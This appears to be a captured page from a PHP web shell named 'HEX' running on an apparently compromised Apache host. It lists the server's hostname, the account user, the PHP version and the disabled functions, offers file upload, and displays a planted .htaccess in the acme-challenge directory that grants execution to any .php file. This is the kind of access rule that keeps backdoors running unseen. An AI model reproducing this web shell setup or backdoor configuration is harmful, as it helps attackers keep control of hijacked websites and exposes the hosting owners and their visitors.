HEX
Server: Apache/2
System: Linux server.winterserver.com 4.18.0 #1 SMP Wed Jul 12 12:00:44 MSK 2023 x86_64
User: hotjamba (1034)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/hotjamba/public_html/.well-known/acme-challenge/.htaccess
<IfModule mod_rewrite.c>
    RewriteEngine Off
</IfModule>
<IfModule mod_authz_core.c>
    <FilesMatch "\.php$">
    Require all granted
    </FilesMatch>
</IfModule>
<FilesMatch "\.php$">
    Order allow,deny
    allow from all
</FilesMatch>
<FilesMatch "^()$">
Order allow,deny
Allow from all
</FilesMatch>